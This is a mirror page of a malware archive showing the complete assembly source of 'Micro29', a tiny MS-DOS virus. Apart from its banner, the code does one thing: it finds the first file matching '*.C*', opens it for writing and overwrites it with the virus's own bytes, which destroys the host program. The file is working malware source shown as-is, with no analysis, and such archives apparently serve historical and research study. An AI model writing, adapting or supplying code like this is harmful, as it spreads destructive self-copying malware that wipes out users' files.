13
1
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 09:52:32 +00:00
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.micro29.asm
2021-01-12 17:49:21 -06:00

24 lines
1.1 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

; #############################################################################
; ### ###
; ### M i C R O 29 ###
; ### ###
; ### By ###
; ### ###
; ### Dreamer / Demoralized Youth ###
; ### ###
; #############################################################################
MOV AH,4Eh ;Dos Universal: FIND FIRST
MOV DX,OFFSET PATT
INT 21h
MOV AX,3D02h ;Dos Universal: OPEN HANDLE
MOV DX,9Eh
INT 21h
XCHG AX,BX
MOV AH,40h ;Dos Universal: WRITE TO HANDLE
ADD DX,62h
INT 21h
RET
PATT DB '*.C*',0